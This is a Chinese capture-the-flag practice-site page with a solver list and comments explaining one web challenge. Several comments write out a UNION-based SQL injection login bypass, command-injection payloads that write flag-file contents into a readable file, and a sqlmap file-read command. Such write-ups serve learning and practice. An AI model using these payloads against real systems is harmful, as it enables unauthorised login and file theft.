评分(5)
解题动态

shuxu115 攻破了该题 5小时前

nohair7596 攻破了该题 1天前

蓝曦 攻破了该题 1天前

霡霂大魔王 攻破了该题 3天前

AIRForce 攻破了该题 3天前

decade1qiu 攻破了该题 4天前

qiyurenji 攻破了该题 4天前

ssqs 攻破了该题 4天前

Deyudeyu 攻破了该题 5天前

mps11 攻破了该题 5天前

nina123 攻破了该题 6天前

BotTle527 攻破了该题 6天前


wangif424 攻破了该题 6天前

yeran 攻破了该题 9天前

qingfeng1115 攻破了该题 10天前

阳光茉莉 攻破了该题 12天前

Aikhfg 攻破了该题 13天前

opppo 攻破了该题 13天前

yhyyhy 攻破了该题 15天前

评论
sunset2004 16天前
举报
username=admin' union select 1,md5(123)#&password=123,union生成临时表将md5后的123到表里,然后密码输入123即可绕过。RCE直接通过重定向符号即可,将无回显的结果保存到a.txt里即可,123 | cat ../../../../flag > a.txt
Zhou_re-pwn 20天前
举报
没太看懂这题出的啥意思,进入监控系统后,和wp的绕过一模一样,结果回显没有显示
0x2d3CN 1月前
举报
直接sqlmap梭哈 文件读取
Yoruko39 1月前
举报
sql注入+RCE,但主要是代码审计,进入命令界面后,发现可以用;截断执行命令,但无回显。 可以用重定向符,将执行结果输出到文件中,再访问/a.txt即可,例如可以;cat * > a.txt,此时可以看到当前目录下所有文件,审计发现flag在一个宏变量$FLAG里,echo到文件即可
toonavy 2月前
举报
进程监控系统 输入需要检测的服务 ,退币!!!
Zhumeng 2月前
举报
这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag
Zhumeng 2月前
举报
这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag
Kyrie-Lrving 3月前
举报
好啊好啊,坑我3次了,每次一测试环境就崩,啥东西呀
cccczz 3月前
举报
sqlmap -r xxx.txt --batch --file-read=/flag
我是CTF大王 3月前
举报
username=admin' union select 1,md5(123)#&password=123 进入命令界面,ls没有内容,所以有可能在上层目录。123| cat ../../../../flag > test 把flag写进test文件,再http://114.67.175.224:14269/test 读出来就行了。